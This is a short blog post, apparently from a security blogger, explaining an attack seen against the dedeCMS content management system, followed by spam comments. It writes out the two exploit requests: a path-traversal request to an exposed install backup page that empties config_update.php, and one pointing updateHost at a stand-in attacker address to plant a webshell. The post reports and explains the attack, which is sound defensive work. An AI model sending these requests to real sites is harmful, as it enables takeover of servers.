Saw this attack below that appears to be targted at China's popular CMS dedeCMS.
HEAD /install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=../data/admin/config_update.php
It appears that if this vulnerable page was available and exposed and not patched then the attacker can gain remote access per this blog i read
Above is step 1 in the process which Clears the contents of config_update.php, which is likely an important file for the CMS and if empty now the guards are down on the site.
Then the 2nd step it says is that the attacker will send a similar request that Create local HTTP services like this below.
GET /install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=hello.php&updateHost=http://BADGUYIP:BADGUYPORT/
And your webshell would now live here
GET /install/hello.php
and your site is owned.
More about neonprimetime
Top Blogs of all-time
Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.
Thank you so much for such a raw and honest post.
ReplyDeleteWeb Development Service in India
Great Post with valuable information. Thank you for the knowledge.
ReplyDeletePHP Online Classes
online php course with certificate